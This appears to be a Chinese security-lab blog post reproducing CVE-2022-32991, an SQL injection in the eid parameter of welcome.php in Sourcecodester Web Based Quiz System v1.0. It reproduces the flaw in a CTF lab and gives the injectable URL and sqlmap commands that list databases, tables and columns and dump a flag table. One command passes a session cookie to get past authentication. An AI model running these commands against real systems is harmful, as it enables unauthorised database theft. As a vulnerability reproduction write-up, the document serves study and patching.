网安引领时代,弥天点亮未来
Sourcecodester Web Based Quiz System是 (Sourcecodester)开源的一个应用软件。用于一个简单的在线基础的项目。
Web Based Quiz System v1.0版本存在安全漏洞,该漏洞源于通过 welcome.php 中的eid 参数发现存在 SQL 注入漏洞。
Web Based Quiz System v1.0
1.访问漏洞环境
2.对漏洞进行复现
POC
eid参数存在sql注入
/welcome.php?q=quiz&step=2&eid=3.sqlmap工具测试(漏洞存在)
方式1
python sqlmap.py -r CVE.txt --batch --dbs
方式2
python sqlmap.py -u "http://eci-2zeh6ot3y7f5t10zjnu4.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694" --batch --dbs
变形
python sqlmap.py -u "http://eci-2zeh6ot3y7f5t10zjnu4.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --random-agent --cookie="PHPSESSID=qlkv9cluk0vseqrcskm5klejt7" --batch --dbs--cookie #绕过身份验证--random-agent #使用随机UA--batch #默认后续sqlmap操作都为Y-p #指定sqlmap注入的传参参数
测试获取数据,通过上述操作已经获取了数据库名,接下来获取表名
python sqlmap.py -r CVE.txt --batch -D "ctf" --tables
接下来获取字段名
python sqlmap.py -r CVE.txt --batch -D "ctf" -T "flag" --columns
接下来获取内容
python sqlmap.py -r CVE.txt --batch -D "ctf" -T "flag" -C "flag" --dump
目前官方已发布安全更新,建议受影响用户尽快更新到安全版本:
https://www.sourcecodester.com/参考链接
https://mp.weixin.qq.com/s/CdezEIpq8QQVcBlsZVB_AA
https://yunjing.ichunqiu.com
弥天简介
学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。
口号 网安引领时代,弥天点亮未来
知识分享完了
喜欢别忘了关注我们哦~
学海浩茫,
弥 天
安全实验室
原文始发于微信公众号(弥天安全实验室):Web Based Quiz System SQL注入漏洞(CVE-2022-32991)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论